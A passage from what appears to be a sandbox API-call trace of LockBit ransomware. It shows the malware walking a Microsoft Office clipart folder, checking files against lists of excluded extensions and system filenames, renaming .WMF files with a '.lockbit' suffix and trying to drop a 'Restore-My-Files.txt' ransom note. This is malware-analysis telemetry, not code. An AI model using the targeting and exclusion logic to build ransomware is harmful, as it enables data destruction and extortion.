-1 [0154.054] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.054] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.055] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.055] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.056] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0278702.WMF") returned 1 [0154.057] lstrcmpiW (lpString1="ntldr", lpString2="J0278702.WMF") returned 1 [0154.057] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0278702.WMF") returned 1 [0154.057] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0278702.WMF") returned -1 [0154.057] lstrcmpiW (lpString1="autorun.inf", lpString2="J0278702.WMF") returned -1 [0154.057] lstrcmpiW (lpString1="thumbs.db", lpString2="J0278702.WMF") returned 1 [0154.057] lstrcmpiW (lpString1="iconcache.db", lpString2="J0278702.WMF") returned -1 [0154.057] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.057] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF") returned=".WMF" [0154.057] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.057] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.057] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.058] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.059] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.059] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.059] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.059] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.059] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF.lockbit") returned 72 [0154.059] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0278702.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.060] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.060] malloc (_Size=0x40068) returned 0x3e70008 [0154.060] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3946) returned 1 [0154.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0154.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0154.061] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.111] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.111] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0154.111] free (_Block=0x1fa2ed8) [0154.111] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.111] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.111] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4330, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0279644.WMF", cAlternateFileName="")) returned 1 [0154.111] lstrcmpiW (lpString1=".", lpString2="J0279644.WMF") returned -1 [0154.111] lstrcmpiW (lpString1="..", lpString2="J0279644.WMF") returned -1 [0154.111] PathFindExtensionW (pszPath="J0279644.WMF") returned=".WMF" [0154.111] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.111] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.111] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.111] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.112] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.112] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.113] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0279644.WMF") returned 1 [0154.113] lstrcmpiW (lpString1="ntldr", lpString2="J0279644.WMF") returned 1 [0154.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0279644.WMF") returned 1 [0154.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0279644.WMF") returned -1 [0154.113] lstrcmpiW (lpString1="autorun.inf", lpString2="J0279644.WMF") returned -1 [0154.113] lstrcmpiW (lpString1="thumbs.db", lpString2="J0279644.WMF") returned 1 [0154.113] lstrcmpiW (lpString1="iconcache.db", lpString2="J0279644.WMF") returned -1 [0154.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.114] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF") returned=".WMF" [0154.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.114] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.114] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.115] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF.lockbit") returned 72 [0154.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0279644.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.117] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.117] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.117] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17200) returned 1 [0154.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.118] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.123] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.123] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.125] free (_Block=0x1fa2ed8) [0154.125] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.125] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.125] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.125] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x11dee, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0280468.WMF", cAlternateFileName="")) returned 1 [0154.125] lstrcmpiW (lpString1=".", lpString2="J0280468.WMF") returned -1 [0154.125] lstrcmpiW (lpString1="..", lpString2="J0280468.WMF") returned -1 [0154.125] PathFindExtensionW (pszPath="J0280468.WMF") returned=".WMF" [0154.125] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.125] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.125] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.125] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.127] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.127] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0280468.WMF") returned 1 [0154.128] lstrcmpiW (lpString1="ntldr", lpString2="J0280468.WMF") returned 1 [0154.128] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0280468.WMF") returned 1 [0154.128] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0280468.WMF") returned -1 [0154.128] lstrcmpiW (lpString1="autorun.inf", lpString2="J0280468.WMF") returned -1 [0154.128] lstrcmpiW (lpString1="thumbs.db", lpString2="J0280468.WMF") returned 1 [0154.128] lstrcmpiW (lpString1="iconcache.db", lpString2="J0280468.WMF") returned -1 [0154.128] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.128] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF") returned=".WMF" [0154.128] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.128] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.128] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.129] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.129] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF.lockbit") returned 72 [0154.129] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0280468.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 